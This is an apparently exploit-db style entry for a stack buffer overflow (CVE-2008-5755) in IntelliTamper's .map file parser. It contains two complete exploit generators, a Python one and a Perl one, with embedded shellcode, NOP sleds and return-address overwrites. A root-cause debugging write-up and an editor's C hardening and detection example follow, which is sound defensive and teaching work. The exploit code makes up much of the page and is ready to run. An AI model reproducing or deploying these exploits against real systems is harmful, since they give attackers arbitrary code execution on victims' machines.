IntelliTamper 2.07/2.08 - MAP File Local SEH Overwrite Exploit
2008-12-28T00:00:00
ID EDB-ID:7582 Type exploitdb Reporter Cnaph Modified 2008-12-28T00:00:00
Description
IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit. CVE-2008-5755. Local exploit for windows platform
#!/usr/bin/python
# IntelliTamper 2.07/2.08 (MAP File) 0-day Local SEH Overwrite Exploit
# Bug discovered by cN4phux <cN4phux@gmail.com>
# Tested on: IntelliTamper 2.07/2.08 / win32 SP3 FR
# Shellcode: Windows Execute Command (calc) <metasploit.com>
#
# Debugger output at the crash: EIP is overwritten and the process faults trying
# to execute at 41414141, so a plain run of 'A's is enough to crash it:
# EAX 0015B488 ECX 00123400 EDX 00123610
# EBX 00000000 ESP 00123604 EBP 00128B78
# ESI 00000000 EDI 00123A64 EIP 41414141
#
# Editor's note: despite the title, the crash shown above is a straight overwrite
# of the saved return address (EIP = 41414141), not an SEH chain overwrite; the
# EXITFUNC=seh in the payload only selects how the shellcode exits afterwards.
#
# Long live the Algerians & greetz to friends: me (XD) Heurs, Djug, Blub, His0k4, Knuthy, Moorish, Ilyes
# Here's the PoC (Python 2; the file is written in text mode, as in the original):
import sys

# MAP file header line: "### SITEMAP1 INTELLITAMPER\r\n"
map_theader = ("\x23\x23\x23\x20\x53\x49\x54\x45\x4D"
               "\x41\x50\x31\x20\x49\x4E\x54\x45\x4C"
               "\x4C\x49\x54\x41\x4D\x50\x45\x52\x0D\x0A")

# Entry prefix "FILE##"; the over-long entry name that follows it is what overflows
map_iheader = "\x46\x49\x4C\x45\x23\x23"

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = ("\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc5"
             "\x91\xc1\x60\x83\xeb\xfc\xe2\xf4\x39\x79\x85\x60\xc5\x91\x4a\x25"
             "\xf9\x1a\xbd\x65\xbd\x90\x2e\xeb\x8a\x89\x4a\x3f\xe5\x90\x2a\x29"
             "\x4e\xa5\x4a\x61\x2b\xa0\x01\xf9\x69\x15\x01\x14\xc2\x50\x0b\x6d"
             "\xc4\x53\x2a\x94\xfe\xc5\xe5\x64\xb0\x74\x4a\x3f\xe1\x90\x2a\x06"
             "\x4e\x9d\x8a\xeb\x9a\x8d\xc0\x8b\x4e\x8d\x4a\x61\x2e\x18\x9d\x44"
             "\xc1\x52\xf0\xa0\xa1\x1a\x81\x50\x40\x51\xb9\x6c\x4e\xd1\xcd\xeb"
             "\xb5\x8d\x6c\xeb\xad\x99\x2a\x69\x4e\x11\x71\x60\xc5\x91\x4a\x08"
             "\xf9\xce\xf0\x96\xa5\xc7\x48\x98\x46\x51\xba\x30\xad\x61\x4b\x64"
             "\x9a\xf9\x59\x9e\x4f\x9f\x96\x9f\x22\xf2\xa0\x0c\xa6\x91\xc1\x60")  # 160 bytes

# NOP sled: 327 NOPs + 160 bytes of shellcode puts the next 4 bytes on the saved return address
header_nop = "\x90" * 327

# Saved return address is overwritten with 0x0012347b, a hard-coded stack address that,
# by the ESP/EIP values in the crash dump, falls inside the NOP sled just below the
# saved return address. The trailing NUL terminates the overflowing name, so nothing
# after it is copied; ".html\n" just closes the line so the parser accepts the entry.
retn = "\x7b\x34\x12\x00" + ".html\n"  # EIP value with 4 byte fix

exploit = map_theader + map_iheader + header_nop + shellcode + retn
headers = open("0x.map", "w")
headers.write(exploit)
headers.close()

print "\nFile created successfully !"
print "\ncN4phux."

# milw0rm.com [2008-12-28]
Source: https://www.exploit-db.com/exploits/7582/ (download: https://www.exploit-db.com/download/7582/)
CVSS 2: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
OSVDB: 51321
Related: CVE-2008-5755; EDB-ID:6106 (earlier exploit for the same bug); MYHACK58:62201783727 (root-cause analysis)
Related entries

CVE-2008-5755 (NVD; published 2008-12-30, modified 2017-09-29; CVSS 2: 9.3, AV:N/AC:M/Au:N/C:C/I:C/A:C)
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5755
Stack-based buffer overflow in IntelliTamper 2.07 and 2.08 allows remote attackers to execute arbitrary code via a MAP file containing a long URL, possibly a related issue to CVE-2006-2494.

EDB-ID:6106 - IntelliTamper 2.07 - map file Local Arbitrary Code Execution Exploit (pl)
Published 2008-07-21, reporter k`sOSe. CVE-2008-5755. Local exploit for windows platform.
https://www.exploit-db.com/exploits/6106/ (download: https://www.exploit-db.com/download/6106/)
An earlier exploit for the same bug. It uses a FOLDER## entry instead of FILE##, an alphanumeric (x86/alpha_mixed) payload because \x89 is a bad character, a short jmp ("\xeb\x20", "jump ahead") in front of the entry, and an ASCII-friendly "call EDI" gadget (\x59\x51\x3d\x7e) as the return address instead of a hard-coded stack pointer:

#!/usr/bin/perl
# k`sOSe - 7/21/2008
# http://secunia.com/advisories/20172
# A sploit for an ancient vuln. Just because i need
# to improve my skills on windows explotation.

use warnings;
use strict;

# CMD="c:\windows\system32\calc.exe"
# [*] x86/alpha_mixed succeeded, final size 345
# bad char -> \x89

my $shellcode =
"\x54\x5a\xda\xd0\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" .
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" .
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b" .
"\x4c\x4a\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55" .
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a\x4b" .
"\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x46\x51\x49" .
"\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51" .
"\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c\x34\x47\x4b\x50" .
"\x54\x51\x34\x44\x44\x42\x55\x4a\x45\x4c\x4b\x51\x4f\x46\x44" .
"\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51" .
"\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31" .
"\x4a\x4b\x4d\x59\x51\x4c\x46\x44\x45\x54\x48\x43\x51\x4f\x46" .
"\x51\x4c\x36\x43\x50\x51\x46\x43\x54\x4c\x4b\x50\x46\x50\x30" .
"\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c" .
"\x4b\x42\x48\x44\x48\x4c\x49\x4b\x48\x4d\x53\x49\x50\x42\x4a" .
"\x46\x30\x45\x38\x4a\x50\x4d\x5a\x45\x54\x51\x4f\x45\x38\x4a" .
"\x38\x4b\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x45\x33" .
"\x47\x4a\x51\x4c\x42\x57\x43\x59\x42\x4e\x43\x54\x42\x4f\x44" .
"\x37\x42\x53\x51\x4c\x44\x33\x44\x39\x44\x33\x44\x34\x43\x55" .
"\x42\x4d\x46\x53\x47\x42\x51\x4c\x43\x53\x43\x51\x42\x4c\x45" .
"\x33\x46\x4e\x42\x45\x43\x48\x43\x55\x45\x50\x45\x5a\x41\x41";

print   "### SITEMAP1 INTELLITAMPER\n"  .
        "\x41\x41"                      .
        "\xeb\x20"                      . # jump ahead
        "FOLDER##"                      .
        "\x41" x 24                     .
        $shellcode                      .
        "E" x 108                       .
        "\x59\x51\x3d\x7e"              . # ASCII friendly 'call EDI'
        "AAAA\n";

# milw0rm.com [2008-07-21]

MYHACK58:62201783727 - IntelliTamper .map code execution vulnerability, CVE-2008-5755 (vulnerability warning, myhack58)
Published 2017-02-25. http://www.myhack58.com/Article/html/3/62/2017/83727.htm
Author: k0shl. If reprinting, please credit the source: http://whereisk0shl.top

### Vulnerability description

Software download:
https://www.exploit-db.com/apps/91891f4b53d5e61e66061454ab87ccc7-intellitamper_v2.07.exe

PoC: the EDB-ID:7582 Python generator reproduced at the top of this page.

Test environment: Windows XP SP3

The generated .map file has to follow a particular format; the shellcode portion can be replaced with a malformed run of \x41 bytes. Generate the .map file and open it directly in IntelliTamper to trigger the vulnerability.

### Vulnerability reproduction and locating

The vulnerability is caused by improper handling when IntelliTamper reads a .map file: a long string is passed into a function call, the return address is overwritten, and the result is a stack buffer overflow. A detailed analysis follows.

First build the PoC .map file and open it with IntelliTamper. The program crashes; attach WinDbg to land at the crash site.

(198.238): Access violation - code c0000005 (!!! second chance !!!)
eax=00176d68 ebx=00000000 ecx=00123400 edx=0012367d esi=00000000 edi=00123a64
eip=41414141 esp=00123604 ebp=00128b78 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
41414141 ?? ???

Walk the call stack with kb:

0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
00123600 41414141 41414141 41414141 41414141 0x41414141
00128b78 00000000 00000000 00000000 00000000 0x41414141

The stack has been completely trashed at this point, so we have to go back to before the vulnerability triggers to see what the stack looked like.

0:000> dc esp l100
00123604 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00123614 41414141 23232341 64644120 656c6946 AAAAA### AddFile
00123624 3a202928 6c694620 31232065 41415b20 () : File #1 [AA
00123634 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00123644 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00123654 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00123664 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00123674 205d4141 65646461 41002e64 41414141 AA] added..AAAAA
00123684 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00123694 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA

Note the status string "AddFile() : File #1 [AAAA...] added." sitting just above the smashed return address: the attacker-controlled entry name is being formatted into a stack-resident message, which suggests the unbounded copy to look for.

So we use OllyDbg to set breakpoints on the key functions involved in opening the file. Open the program in OllyDbg and view the intermodular calls; reading the file must involve file operations, and we find the key function, ReadFile:

Found intermodular call, entry 5
Address=004017F7
Disassembly=call dword ptr ds:[<&KERNEL32.ReadFile>]
Target file=kernel32.ReadFile

Set a breakpoint on every call to ReadFile in the program's address space. Press F9 to run, open the PoC file, and the breakpoint hits in a call to ReadFile.

Press F9 again to reach the crash. This confirms that the .map file is read before that breakpoint, so from this point we work forward step by step toward the vulnerability site.

## Vulnerability analysis

Sticking with WinDbg for the analysis, set a breakpoint on the ReadFile call located above.

Breakpoint 0 hit
eax=00123650 ebx=00128b78 ecx=7c9301bb edx=00000282 esi=00000282 edi=00000110
eip=00412ed4 esp=0012360c ebp=001734c0 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
intellitamper+0x12ed4:
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
00412ed4 ff1540e04100 call dword ptr [intellitamper+0x1e040 (0041e040)] ds:0023:0041e040={kernel32!ReadFile (7c801812)}

After the break, single-stepping shows the program entering a loop. This is a copy loop that runs over the data after ReadFile returns; following it, I found a check inside the loop:

.text:00413449 not ecx
.text:0041344B dec ecx
.text:0041344C cmp edx, ecx
.text:0041344E jnz loc_413824

(The not ecx / dec ecx pair looks like the tail of the compiler's inline strlen idiom after repne scasb, which leaves ecx holding the length of the NUL-terminated string; edx is then compared against that length.)

The article continues in parts 2 and 3 at the URL above; they are not reproduced on this page.
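The crash dump in the analysis above shows the over-long FILE## entry name being formatted into a status string ("AddFile() : File #1 [...] added.") on the stack, and the PoC at the top of the page sizes its NOP sled and shellcode so that the next four bytes land on the saved return address. The C below is an example added by the editor; it is not IntelliTamper's code and not taken from either exploit on this page. It reconstructs the unbounded sprintf-into-stack-buffer shape the dump implies, puts a bounded version beside it, and adds a small triage scanner that flags .map files with the PoC's shape. MSG_CAP, NAME_LIMIT, the line grammar (FILE##/FOLDER## entries after the "### SITEMAP1 INTELLITAMPER" header) and the constructed inputs are assumptions made for illustration; the real binary's buffer size and parser are not known from this page.

```c
/* Editor's added example (not IntelliTamper's code and not from either exploit
 * on this page): the overflow shape the crash dump implies, a bounded
 * replacement, and a triage scanner for .map files. MSG_CAP, NAME_LIMIT and
 * the line grammar are assumptions made for illustration. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MSG_CAP    256   /* assumed size of the stack buffer for the status line */
#define NAME_LIMIT 200   /* assumed sane upper bound for one entry name */

/* Vulnerable shape: sprintf() into a fixed stack buffer with no check on the
 * length of name. The PoC's 491-byte entry runs past msg[] and over the saved
 * return address. Shown only for contrast; nothing here calls it. */
void vulnerable_addfile(const char *name)
{
    char msg[MSG_CAP];
    sprintf(msg, "AddFile() : File #1 [%s] added.", name);   /* unbounded copy */
    (void)msg;
}

/* Hardened shape: bound the length check itself (no strlen() over untrusted
 * data), format with snprintf(), and treat truncation as an error.
 * Returns 0 on success, -1 if the name is rejected or would not fit in msg. */
int hardened_addfile(const char *name, char *msg, size_t cap)
{
    size_t n = 0;
    while (n <= NAME_LIMIT && name[n] != '\0')
        n++;
    if (n > NAME_LIMIT)
        return -1;
    int w = snprintf(msg, cap, "AddFile() : File #1 [%s] added.", name);
    return (w < 0 || (size_t)w >= cap) ? -1 : 0;
}

/* Triage scanner. Returns 1 if the sitemap header is missing, or if any
 * FILE## / FOLDER## entry is longer than NAME_LIMIT or contains a byte that is
 * neither printable ASCII nor whitespace (a NOP sled or shellcode trips both
 * checks); returns 0 for a clean file. */
int scan_map(const char *data, size_t len)
{
    static const char hdr[] = "### SITEMAP1 INTELLITAMPER";
    if (len < sizeof hdr - 1 || memcmp(data, hdr, sizeof hdr - 1) != 0)
        return 1;
    size_t i = 0;
    while (i < len) {
        const char *line = data + i;
        size_t linelen = 0;
        while (i + linelen < len && line[linelen] != '\n')
            linelen++;
        i += linelen + 1;                       /* step past the '\n' */
        const char *body = NULL;
        if (linelen >= 6 && memcmp(line, "FILE##", 6) == 0)
            body = line + 6;
        else if (linelen >= 8 && memcmp(line, "FOLDER##", 8) == 0)
            body = line + 8;
        if (body == NULL)
            continue;
        size_t blen = (size_t)(line + linelen - body);
        if (blen > NAME_LIMIT)
            return 1;
        for (size_t k = 0; k < blen; k++) {
            unsigned char c = (unsigned char)body[k];
            if (!isprint(c) && !isspace(c))
                return 1;
        }
    }
    return 0;
}

/* Constructed input with the PoC's layout: header, "FILE##", 327 NOPs, 160
 * bytes standing in for the shellcode, the address 0x0012347b and the ".html\n"
 * tail. Returns the number of bytes written, or 0 if out is too small. */
size_t build_poc_map(char *out, size_t cap)
{
    static const char head[] = "### SITEMAP1 INTELLITAMPER\r\nFILE##";
    static const char tail[] = "\x7b\x34\x12\x00.html\n";
    size_t need = (sizeof head - 1) + 327 + 160 + (sizeof tail - 1);
    if (cap < need)
        return 0;
    char *p = out;
    memcpy(p, head, sizeof head - 1); p += sizeof head - 1;
    memset(p, 0x90, 327);             p += 327;
    memset(p, 'S', 160);              p += 160;    /* shellcode placeholder */
    memcpy(p, tail, sizeof tail - 1); p += sizeof tail - 1;
    return (size_t)(p - out);
}

int main(void)
{
    char map[1024], msg[MSG_CAP];
    size_t n = build_poc_map(map, sizeof map);
    printf("PoC-shaped map: %zu bytes, flagged=%d\n", n, scan_map(map, n));
    printf("hardened_addfile(\"index.html\") -> %d: %s\n",
           hardened_addfile("index.html", msg, sizeof msg), msg);
    return 0;
}
```

The scanner is deliberately strict: a legitimate sitemap entry is a printable URL, so either a name longer than NAME_LIMIT or a single NOP/shellcode byte in the name field is enough to flag the file. vulnerable_addfile() is never called; it sits beside hardened_addfile() only so the difference (a bounded length check plus snprintf() with the truncation result checked) is visible in one screen.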